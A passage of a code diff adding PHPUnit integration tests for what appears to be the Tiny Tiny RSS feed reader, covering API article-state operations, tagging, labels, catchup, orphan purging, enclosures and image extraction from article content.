+        $this->assertTrue($article['unread'], "Article should start as unread");
+        $this->assertFalse($article['marked'], "Article should not be marked initially");
+        $this->assertArrayHasKey('title', $article);
+        $this->assertArrayHasKey('guid', $article);
+        $this->assertArrayHasKey('content', $article);
+        $this->assertArrayHasKey('feed_id', $article);
+
+        // 2. Mark the article as read using updateArticle
+        // field=2 (unread), mode=0 (false)
+        $resp = $this->api([
+            "op" => "updateArticle",
+            "article_ids" => $article_id,
+            "field" => 2,
+            "mode" => 0,
+        ]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+        $this->assertEquals(1, $resp['content']['updated']);
+
+        // 3. Retrieve the article again and verify the change
+        $resp = $this->api(["op" => "getArticle", "article_id" => $article_id]);
+        $this->common_assertions($resp);
+
+        $article = $resp['content'][0];
+        $this->assertFalse($article['unread'], "Article should now be read");
+
+        // 4. Toggle unread back to true (mode=2 toggles)
+        $resp = $this->api([
+            "op" => "updateArticle",
+            "article_ids" => $article_id,
+            "field" => 2,
+            "mode" => 2,
+        ]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // 5. Verify it is unread again after toggle
+        $resp = $this->api(["op" => "getArticle", "article_id" => $article_id]);
+        $this->common_assertions($resp);
+
+        $article = $resp['content'][0];
+        $this->assertTrue($article['unread'], "Article should be unread after toggle");
+    }
+
+    public function test_markArticleAsMarked() : void {
+        // Article 3 (uuid-hn-003) starts as marked=true (from seed.sql)
+        $article_id = 3;
+
+        // 1. Retrieve the article and verify initial state
+        $resp = $this->api(["op" => "getArticle", "article_id" => $article_id]);
+        $this->common_assertions($resp);
+
+        $article = $resp['content'][0];
+        $this->assertTrue($article['marked'], "Article should start as marked");
+
+        // 2. Unmark the article (field=0=marked, mode=0=false)
+        $resp = $this->api([
+            "op" => "updateArticle",
+            "article_ids" => $article_id,
+            "field" => 0,
+            "mode" => 0,
+        ]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // 3. Verify it is now unmarked
+        $resp = $this->api(["op" => "getArticle", "article_id" => $article_id]);
+        $this->common_assertions($resp);
+
+        $article = $resp['content'][0];
+        $this->assertFalse($article['marked'], "Article should now be unmarked");
+    }
+
+    public function test_subscribeUnsubscribeLifecycle() : void {
+        $feed_url = $this->app_url . "/tests_integration/feed.xml";
+
+        // 1. Subscribe to a feed
+        $resp = $this->api(["op" => "subscribeToFeed", "feed_url" => $feed_url]);
+        $this->common_assertions($resp);
+        $this->assertArrayHasKey("feed_id", $resp['content']['status']);
+
+        $feed_id = $resp['content']['status']['feed_id'];
+        $this->assertIsInt($feed_id);
+
+        // 2. Verify the feed appears in getFeedTree
+        $resp = $this->api(["op" => "getFeedTree"]);
+        $this->common_assertions($resp);
+
+        $found = false;
+        foreach ($resp['content']['categories']['items'] as $cat) {
+            foreach ($cat['items'] as $feed) {
+                if (($feed['bare_id'] ?? -1) === $feed_id) {
+                    $found = true;
+                    $this->assertIsString($feed['name']);
+                    $this->assertArrayHasKey("unread", $feed);
+                    break 2;
+                }
+            }
+        }
+        $this->assertTrue($found, "Subscribed feed should appear in getFeedTree");
+
+        // 3. Unsubscribe from the feed
+        $resp = $this->api(["op" => "unsubscribeFeed", "feed_id" => $feed_id]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // 4. Verify the feed no longer appears in getFeedTree
+        $resp = $this->api(["op" => "getFeedTree"]);
+        $this->common_assertions($resp);
+
+        $found = false;
+        foreach ($resp['content']['categories']['items'] as $cat) {
+            foreach ($cat['items'] as $feed) {
+                if (($feed['bare_id'] ?? -1) === $feed_id) {
+                    $found = true;
+                    break 2;
+                }
+            }
+        }
+        $this->assertFalse($found, "Unsubscribed feed should not appear in getFeedTree");
+    }
+
+    public function test_apiResponseHasContentLength() : void {
+        $ch = curl_init($this->api_url);
+
+        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-type: application/json"]);
+        curl_setopt($ch, CURLOPT_POST, true);
+        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
+            "op"   => "getVersion",
+            "sid"  => $this->sid,
+        ]));
+
+        $resp = curl_exec($ch);
+        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
+
+        $this->assertEquals(200, $status);
+
+        $contentLength = curl_getinfo($ch, CURLINFO_CONTENT_LENGTH_DOWNLOAD);
+        $this->assertGreaterThan(0, $contentLength, "Content-Length header should be present and nonzero");
+
+        // Verify the reported Content-Length matches the actual body length
+        $this->assertEquals(strlen($resp), (int) $contentLength,
+            "Content-Length should match actual response body size");
+
+        curl_close($ch);
+    }
+
+    public function test_catchupFeed() : void {
+        $feed_url = $this->app_url . "/tests_integration/feed.xml";
+
+        // Subscribe to a feed to get a valid feed_id
+        $resp = $this->api(["op" => "subscribeToFeed", "feed_url" => $feed_url]);
+        $this->common_assertions($resp);
+
+        $feed_id = $resp['content']['status']['feed_id'];
+        $this->assertIsInt($feed_id);
+
+        // Test catchupFeed with default mode ("all")
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id]);
+        $this->common_assertions($resp);
+        $this->assertArrayHasKey("status", $resp['content']);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with explicit mode "all"
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "mode" => "all"]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with mode "1day"
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "mode" => "1day"]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with mode "1week"
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "mode" => "1week"]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with mode "2week"
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "mode" => "2week"]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with is_cat=false (feed mode)
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "is_cat" => false]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+
+        // Test catchupFeed with is_cat=true (category mode)
+        $resp = $this->api(["op" => "catchupFeed", "feed_id" => $feed_id, "is_cat" => true]);
+        $this->common_assertions($resp);
+        $this->assertEquals("OK", $resp['content']['status']);
+    }
+
+}

--- a/tests_integration/ArticleHandlerTest.php
+++ b/tests_integration/ArticleHandlerTest.php
@@ -1,0 +1,275 @@
+<?php
+/** @group integration */
+final class ArticleHandlerTest extends HandlerTestCase {
+
+    // ──────────────────────────────────────────────────────────────────────
+    // setScore()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_set_score_single_article(): void {
+        $resp = $this->invokeHandler('Article', 'setScore', [
+            'ids' => [1],
+            'score' => 5,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+
+        // Verify score in DB
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT score FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $row = $sth->fetch();
+        $this->assertEquals(5, (int) $row['score']);
+    }
+
+    public function test_set_score_multiple_articles(): void {
+        $resp = $this->invokeHandler('Article', 'setScore', [
+            'ids' => [1, 2, 3],
+            'score' => 10,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT ref_id, score FROM ttrss_user_entries WHERE ref_id IN (1,2,3) AND owner_uid = ?");
+        $sth->execute([1]);
+        $results = $sth->fetchAll();
+
+        $this->assertCount(3, $results);
+        foreach ($results as $row) {
+            $this->assertEquals(10, (int) $row['score']);
+        }
+    }
+
+    public function test_set_score_zero(): void {
+        $resp = $this->invokeHandler('Article', 'setScore', [
+            'ids' => [1],
+            'score' => 0,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT score FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $row = $sth->fetch();
+        $this->assertEquals(0, (int) $row['score']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // setArticleTags()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_set_article_tags_new_tags(): void {
+        $resp = $this->invokeHandler('Article', 'setArticleTags', [
+            'id' => 1,
+            'tags_str' => 'new-tag-1,new-tag-2',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('tags', $resp['response']);
+        $this->assertEquals(['new-tag-1', 'new-tag-2'], $resp['response']['tags']);
+    }
+
+    public function test_set_article_tags_replaces_existing(): void {
+        // Article 1 starts with tag_cache 'rust|open-source'
+        $resp = $this->invokeHandler('Article', 'setArticleTags', [
+            'id' => 1,
+            'tags_str' => 'replaced-tag',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertEquals(['replaced-tag'], $resp['response']['tags']);
+
+        // Verify old tags are gone
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT COUNT(*) FROM ttrss_tags WHERE post_int_id = (SELECT int_id FROM ttrss_user_entries WHERE ref_id = 1)");
+        $sth->execute([]);
+        $this->assertEquals(1, (int) $sth->fetchColumn(), 'Should have exactly 1 tag');
+    }
+
+    public function test_set_article_tags_clears_all(): void {
+        $resp = $this->invokeHandler('Article', 'setArticleTags', [
+            'id' => 1,
+            'tags_str' => '',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertEquals([], $resp['response']['tags']);
+
+        // Verify tags table is empty for this article
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT COUNT(*) FROM ttrss_tags WHERE post_int_id = (SELECT int_id FROM ttrss_user_entries WHERE ref_id = 1)");
+        $sth->execute([]);
+        $this->assertEquals(0, (int) $sth->fetchColumn());
+    }
+
+    public function test_set_article_tags_trims_whitespace(): void {
+        $resp = $this->invokeHandler('Article', 'setArticleTags', [
+            'id' => 1,
+            'tags_str' => '  tag-a  ,  tag-b  ',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        // FeedItem_Common::normalize_categories handles trimming
+        $this->assertContains('tag-a', $resp['response']['tags']);
+        $this->assertContains('tag-b', $resp['response']['tags']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // printArticleTags()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_print_article_tags_existing(): void {
+        $resp = $this->invokeHandler('Article', 'printArticleTags', [
+            'id' => 1,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('tags', $resp['response']);
+        $this->assertArrayHasKey('id', $resp['response']);
+        $this->assertEquals(1, $resp['response']['id']);
+    }
+
+    public function test_print_article_tags_empty(): void {
+        // Article 11 has tag_cache 'quantum|computing' from seed
+        $resp = $this->invokeHandler('Article', 'printArticleTags', [
+            'id' => 11,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('tags', $resp['response']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // completeTags()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_complete_tags_returns_matching_tags(): void {
+        // seed.sql has tags 'rust|open-source' for article 1 (stored as comma-separated in tag_cache)
+        // The actual tags table may not have entries yet since we only set tag_cache
+        // Let's insert a tag to test completion
+        $pdo = Db::pdo();
+        $intId = $this->getIntIdForRef(1);
+        $sth = $pdo->prepare("INSERT INTO ttrss_tags (tag_name, owner_uid, post_int_id) VALUES (?, 1, ?)");
+        $sth->execute(['testing-complete', $intId]);
+
+        $resp = $this->invokeHandler('Article', 'completeTags', [
+            'search' => 'test',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertContains('testing-complete', $resp['response']);
+    }
+
+    public function test_complete_tags_no_match(): void {
+        $resp = $this->invokeHandler('Article', 'completeTags', [
+            'search' => 'zzzzzzz-nonexistent',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertEquals([], $resp['response']);
+    }
+
+    public function test_complete_tags_case_sensitive(): void {
+        // Insert a tag starting with 'T' to test case-sensitive completion
+        $pdo = Db::pdo();
+        $intId = $this->getIntIdForRef(1);
+        $sth = $pdo->prepare("INSERT INTO ttrss_tags (tag_name, owner_uid, post_int_id) VALUES (?, 1, ?)");
+        $sth->execute(['TagUppercase', $intId]);
+
+        $resp = $this->invokeHandler('Article', 'completeTags', [
+            'search' => 'T',
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        // Should return tags starting with 'T' (case-sensitive LIKE)
+        $this->assertContains('TagUppercase', $resp['response']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // assigntolabel()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_assign_to_label(): void {
+        $resp = $this->invokeHandler('Article', 'assigntolabel', [
+            'ids' => [1],
+            'lid' => 1,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('labels-for', $resp['response']);
+        $this->assertArrayHasKey('message', $resp['response']);
+        $this->assertEquals('UPDATE_COUNTERS', $resp['response']['message']);
+    }
+
+    public function test_remove_from_label(): void {
+        // First assign a label (article_id references ttrss_entries.id, not int_id)
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("INSERT INTO ttrss_user_labels2 (label_id, article_id) VALUES (1, 1)");
+        $sth->execute([]);
+
+        // Then remove it
+        $resp = $this->invokeHandler('Article', 'removefromlabel', [
+            'ids' => [1],
+            'lid' => 1,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('labels-for', $resp['response']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // getmetadatabyid()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_metadata_by_id(): void {
+        $resp = $this->invokeHandler('Article', 'getmetadatabyid', [
+            'id' => 1,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertArrayHasKey('link', $resp['response']);
+        $this->assertArrayHasKey('title', $resp['response']);
+        $this->assertEquals('https://news.ycombinator.com/item?id=40001', $resp['response']['link']);
+        $this->assertEquals('Show HN: I built a distributed task queue in Rust', $resp['response']['title']);
+    }
+
+    public function test_get_metadata_by_id_nonexistent(): void {
+        $resp = $this->invokeHandler('Article', 'getmetadatabyid', [
+            'id' => 99999,
+        ]);
+
+        $this->assertResponseOk($resp['response']);
+        $this->assertEquals([], $resp['response']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // redirect()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_redirect_valid_article(): void {
+        $resp = $this->invokeHandler('Article', 'redirect', [
+            'id' => 1,
+        ]);
+
+        // Handler redirects with Response::redirect()->send() which sends a 302
+        // The response body is empty for redirects
+        $this->assertEmpty($resp['body']);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // Helper methods
+    // ──────────────────────────────────────────────────────────────────────
+
+    /**
+     * Get the int_id (primary key of ttrss_user_entries) for a given ref_id.
+     */
+    private function getIntIdForRef(int $refId): int {
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT int_id FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([$refId, 1]);
+        $row = $sth->fetch();
+        return (int) $row['int_id'];
+    }
+}

--- a/tests_integration/ArticleTest.php
+++ b/tests_integration/ArticleTest.php
@@ -1,0 +1,370 @@
+<?php
+/** @group integration */
+final class ArticleTest extends DbTestCase {
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _get_tags()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_tags_returns_tags_from_cache(): void {
+        // seed.sql: article 1 has tag_cache = 'rust|open-source'
+        $tags = Article::_get_tags(1);
+        $this->assertEquals(['rust|open-source'], $tags);
+    }
+
+    public function test_get_tags_returns_empty_for_no_tags(): void {
+        // seed.sql: article 2 has tag_cache = 'database|postgresql'
+        $tags = Article::_get_tags(2);
+        $this->assertEquals(['database|postgresql'], $tags);
+    }
+
+    public function test_get_tags_with_custom_owner_uid(): void {
+        // uid=1 has tags; uid=999 has no user_entries
+        $tags = Article::_get_tags(1, 999);
+        $this->assertEquals([], $tags);
+    }
+
+    public function test_get_tags_with_explicit_tag_cache(): void {
+        // When tag_cache is provided, it is split by comma
+        $tags = Article::_get_tags(1, 1, 'explicit,tag,cache');
+        $this->assertEquals(['explicit', 'tag', 'cache'], $tags);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _get_labels()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_labels_returns_cached_labels(): void {
+        // seed.sql: article 1 has label_cache = '' (empty)
+        // This means it should query the database
+        $labels = Article::_get_labels(1);
+        $this->assertEquals([], $labels);
+    }
+
+    public function test_get_labels_returns_no_labels_marker(): void {
+        // When label_cache is empty and no labels in DB, should return empty array
+        // and update cache with no-labels marker
+        $labels = Article::_get_labels(1);
+        $this->assertEquals([], $labels);
+
+        // Verify cache was updated with no-labels marker
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT label_cache FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $row = $sth->fetch();
+        $this->assertNotNull($row);
+        $decoded = json_decode($row['label_cache'], true);
+        $this->assertArrayHasKey('no-labels', $decoded);
+        $this->assertEquals(1, $decoded['no-labels']);
+    }
+
+    public function test_get_labels_with_cached_labels(): void {
+        // Manually set a label cache
+        $pdo = Db::pdo();
+        $labels = [['1', 'test-label-1', '#000000', '#ffffff']];
+        $sth = $pdo->prepare("UPDATE ttrss_user_entries SET label_cache = ? WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([json_encode($labels), 1, 1]);
+
+        $retrieved = Article::_get_labels(1);
+        $this->assertEquals($labels, $retrieved);
+    }
+
+    public function test_get_labels_different_owner(): void {
+        $labels = Article::_get_labels(1, 999);
+        $this->assertEquals([], $labels);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _catchup_by_id()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_catchup_mark_as_read(): void {
+        // Article 1 is unread (from seed.sql)
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT unread, last_read FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $before = $sth->fetch();
+        $this->assertTrue($before['unread']);
+        $this->assertNull($before['last_read']);
+
+        Article::_catchup_by_id([1], Article::CATCHUP_MODE_MARK_AS_READ);
+
+        $sth->execute([1, 1]);
+        $after = $sth->fetch();
+        $this->assertFalse($after['unread']);
+        $this->assertNotNull($after['last_read']);
+    }
+
+    public function test_catchup_mark_as_unread(): void {
+        // Article 3 is read (from seed.sql)
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT unread FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([3, 1]);
+        $before = $sth->fetch();
+        $this->assertFalse($before['unread']);
+
+        Article::_catchup_by_id([3], Article::CATCHUP_MODE_MARK_AS_UNREAD);
+
+        $sth->execute([3, 1]);
+        $after = $sth->fetch();
+        $this->assertTrue($after['unread']);
+    }
+
+    public function test_catchup_toggle(): void {
+        // Article 1 is unread → toggle should make it read
+        Article::_catchup_by_id([1], Article::CATCHUP_MODE_TOGGLE);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT unread, last_read FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $after = $sth->fetch();
+        $this->assertFalse($after['unread']);
+        $this->assertNotNull($after['last_read']);
+
+        // Toggle again → should become unread
+        Article::_catchup_by_id([1], Article::CATCHUP_MODE_TOGGLE);
+        $sth->execute([1, 1]);
+        $after2 = $sth->fetch();
+        $this->assertTrue($after2['unread']);
+    }
+
+    public function test_catchup_multiple_articles(): void {
+        // Mark articles 1, 2, 3 as read at once
+        Article::_catchup_by_id([1, 2, 3], Article::CATCHUP_MODE_MARK_AS_READ);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT ref_id, unread FROM ttrss_user_entries WHERE ref_id IN (1,2,3) AND owner_uid = ?");
+        $sth->execute([1]);
+        $results = $sth->fetchAll();
+
+        $this->assertCount(3, $results);
+        foreach ($results as $row) {
+            $this->assertFalse($row['unread'], "Article {$row['ref_id']} should be marked as read");
+        }
+    }
+
+    public function test_catchup_custom_owner_uid(): void {
+        // Should not affect uid=999's entries
+        Article::_catchup_by_id([1], Article::CATCHUP_MODE_MARK_AS_READ, 999);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT unread FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $sth->execute([1, 1]);
+        $after = $sth->fetch();
+        $this->assertTrue($after['unread'], "uid=1's article should not be affected by uid=999 catchup");
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _purge_orphans()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_purge_orphans_removes_orphaned_entries(): void {
+        // Insert an article without a corresponding user_entry
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "INSERT INTO ttrss_entries (title, guid, link, updated, content, content_hash, date_entered, date_updated) " .
+            "VALUES (?, ?, ?, NOW(), ?, ?, NOW(), NOW()) RETURNING id"
+        );
+        $sth->execute(['Orphan Article', 'tag:test.com,2026:orphan', 'https://test.com/orphan',
+            '<p>Orphan content</p>', 'SHA1:orphan123']);
+        $orphanId = (int) $sth->fetchColumn();
+
+        // Verify it exists before purge
+        $sth = $pdo->prepare("SELECT COUNT(*) FROM ttrss_entries WHERE id = ?");
+        $sth->execute([$orphanId]);
+        $this->assertEquals(1, (int) $sth->fetchColumn());
+
+        Article::_purge_orphans();
+
+        // Verify it was deleted
+        $sth->execute([$orphanId]);
+        $this->assertEquals(0, (int) $sth->fetchColumn());
+    }
+
+    public function test_purge_orphans_keeps_valid_entries(): void {
+        // Article 1 has both ttrss_entries and ttrss_user_entries
+        Article::_purge_orphans();
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare("SELECT COUNT(*) FROM ttrss_entries WHERE id = ?");
+        $sth->execute([1]);
+        $this->assertEquals(1, (int) $sth->fetchColumn(), 'Valid entries should not be purged');
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _get_enclosures()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_enclosures_returns_enclosures_for_article(): void {
+        // seed.sql adds 2 enclosures for article id=1
+        $enclosures = Article::_get_enclosures(1);
+
+        $this->assertCount(2, $enclosures);
+
+        // Check that we have the expected content types
+        $contentTypes = array_column($enclosures, 'content_type');
+        $this->assertContains('video/mp4', $contentTypes);
+        $this->assertContains('image/jpeg', $contentTypes);
+    }
+
+    public function test_get_enclosures_returns_empty_for_no_enclosures(): void {
+        // Article 2 has no enclosures in seed.sql
+        $enclosures = Article::_get_enclosures(2);
+        $this->assertEquals([], $enclosures);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _labels_of() and _feeds_of()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_labels_of_returns_empty_for_empty_array(): void {
+        $labels = Article::_labels_of([]);
+        $this->assertEquals([], $labels);
+    }
+
+    public function test_labels_of_returns_unique_labels(): void {
+        // Articles 1 and 2 are in the same feed but have different tags
+        // Labels are not assigned to these articles in seed, so should be empty
+        $labels = Article::_labels_of([1, 2]);
+        $this->assertEquals([], $labels);
+    }
+
+    public function test_feeds_of_returns_empty_for_empty_array(): void {
+        $feeds = Article::_feeds_of([]);
+        $this->assertEquals([], $feeds);
+    }
+
+    public function test_feeds_of_returns_unique_feeds(): void {
+        // Articles 1, 2, 3 are all in feed_id=1 (Hacker News)
+        $feeds = Article::_feeds_of([1, 2, 3]);
+        $this->assertEquals([1], $feeds);
+    }
+
+    public function test_feeds_of_returns_multiple_feeds(): void {
+        // Articles 1 (feed 1) and 4 (feed 2)
+        $feeds = Article::_feeds_of([1, 4]);
+        $this->assertEquals([1, 2], $feeds);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _get_image()
+    // ──────────────────────────────────────────────────────────────────────
+
+    private function extractOriginalUrl(string $redirectUrl): string {
+        // DiskCache wraps URLs: public.php?op=cached_redirect&url=<encoded>&d=images
+        parse_str(parse_url($redirectUrl, PHP_URL_QUERY), $query);
+        return $query['url'] ?? $redirectUrl;
+    }
+
+    public function test_get_image_extract_youtube_embed(): void {
+        $content = '<p>Check out this video: <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"></iframe></p>';
+        [$image, $stream, $kind] = Article::_get_image([], $content, 'https://example.com', []);
+
+        // DiskCache wraps URLs with a redirect; extract the original URL
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $originalStream = urldecode($this->extractOriginalUrl($stream));
+
+        $this->assertStringContainsString('img.youtube.com/vi/dQw4w9WgXcQ/hqdefault.jpg', $originalImage);
+        $this->assertStringContainsString('youtu.be/dQw4w9WgXcQ', $originalStream);
+        $this->assertEquals(Article::ARTICLE_KIND_YOUTUBE, $kind);
+    }
+
+    public function test_get_image_extract_video_poster(): void {
+        $content = '<video poster="https://example.com/poster.jpg"><source src="https://example.com/video.mp4"></video>';
+        [$image, $stream, $kind] = Article::_get_image([], $content, 'https://example.com', []);
+
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $originalStream = urldecode($this->extractOriginalUrl($stream));
+
+        $this->assertStringContainsString('example.com/poster.jpg', $originalImage);
+        $this->assertStringContainsString('example.com/video.mp4', $originalStream);
+        $this->assertEquals(Article::ARTICLE_KIND_VIDEO, $kind);
+    }
+
+    public function test_get_image_extract_first_image(): void {
+        $content = '<p>Some text <img src="https://example.com/photo.jpg"></p>';
+        [$image, $stream, $kind] = Article::_get_image([], $content, 'https://example.com', []);
+
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $this->assertStringContainsString('example.com/photo.jpg', $originalImage);
+        $this->assertEmpty($stream);
+        $this->assertEquals(0, $kind);
+    }
+
+    public function test_get_image_skips_data_uris(): void {
+        $content = '<img src="data:image/png;base64,abc123">';
+        [$image, $stream, $kind] = Article::_get_image([], $content, 'https://example.com', []);
+
+        $this->assertEmpty($image);
+        $this->assertEmpty($stream);
+        $this->assertEquals(0, $kind);
+    }
+
+    public function test_get_image_falls_back_to_enclosure_image(): void {
+        $content = '<p>No images in content</p>';
+        $enclosures = [['content_type' => 'image/jpeg', 'content_url' => 'https://example.com/enclosure.jpg']];
+        [$image, $stream, $kind] = Article::_get_image($enclosures, $content, 'https://example.com', []);
+
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $this->assertStringContainsString('example.com/enclosure.jpg', $originalImage);
+        $this->assertEmpty($stream);
+        $this->assertEquals(0, $kind);
+    }
+
+    public function test_get_image_does_not_select_non_image_enclosure(): void {
+        $content = '<p>No images in content</p>';
+        $enclosures = [['content_type' => 'video/mp4', 'content_url' => 'https://example.com/video.mp4']];
+        [$image, $stream, $kind] = Article::_get_image($enclosures, $content, 'https://example.com', []);
+
+        $this->assertEmpty($image);
+        $this->assertEmpty($stream);
+        $this->assertEquals(0, $kind);
+    }
+
+    public function test_get_image_mark_album_with_multiple_enclosures(): void {
+        $content = '<p>Single image</p>';
+        $enclosures = [
+            ['content_type' => 'image/jpeg', 'content_url' => 'https://example.com/img1.jpg'],
+            ['content_type' => 'image/png', 'content_url' => 'https://example.com/img2.png'],
+        ];
+        [$image, $stream, $kind] = Article::_get_image($enclosures, $content, 'https://example.com', []);
+
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $this->assertStringContainsString('example.com/img1.jpg', $originalImage);
+        $this->assertEquals(Article::ARTICLE_KIND_ALBUM, $kind);
+    }
+
+    public function test_get_image_rewrites_relative_urls(): void {
+        // Per RFC 3986, both /path and path resolve to root when base ends with /
+        // dirname('/base/') = '/' so relative URLs append to root
+        $content = '<img src="/relative/path.jpg">';
+        [$image, $stream, $kind] = Article::_get_image([], $content, 'https://example.com/base/', []);
+
+        $originalImage = urldecode($this->extractOriginalUrl($image));
+        $this->assertStringContainsString('example.com/relative/path.jpg', $originalImage);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // _format_enclosures()
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_format_enclosures_returns_empty_when_no_enclosures(): void {
+        $result = Article::_format_enclosures(2, false, '<p>Content</p>');
+        $this->assertEquals('', $result['formatted']);
+        $this->assertEquals([], $result['entries']);
+    }
+
+    public function test_format_enclosures_can_inline_flag(): void {
+        // With enclosures and can_inline conditions met
+        $enclosures = [['content_type' => 'image/jpeg', 'content_url' => 'https://example.com/img.jpg',
+            'width' => 800, 'height' => 600, 'title' => 'Test', 'duration' => '0']];
+
+        // bw_limit is empty, STRIP_IMAGES is false (default), no <img> in content
+        $result = Article::_format_enclosures(1, true, '<p>Content</p>');
+
+        $this->assertArrayHasKey('can_inline', $result);
+        $this->assertArrayHasKey('inline_text_only', $result);
+        $this->assertArrayHasKey('entries', $result);
+        $this->assertArrayHasKey('formatted', $result);
+    }
+}

--- a/tests_integration/DbTestCase.php
+++ b/tests_integration/DbTestCase.php
@@ -1,0 +1,71 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Base class for database integration tests that invoke classes directly
+ * (no API layer).
+ *
+ * Provides shared infrastructure: database seeding via seed.sql, and
+ * a default session user (uid=1) for methods that depend on $_SESSION.
+ */
+abstract class DbTestCase extends TestCase {
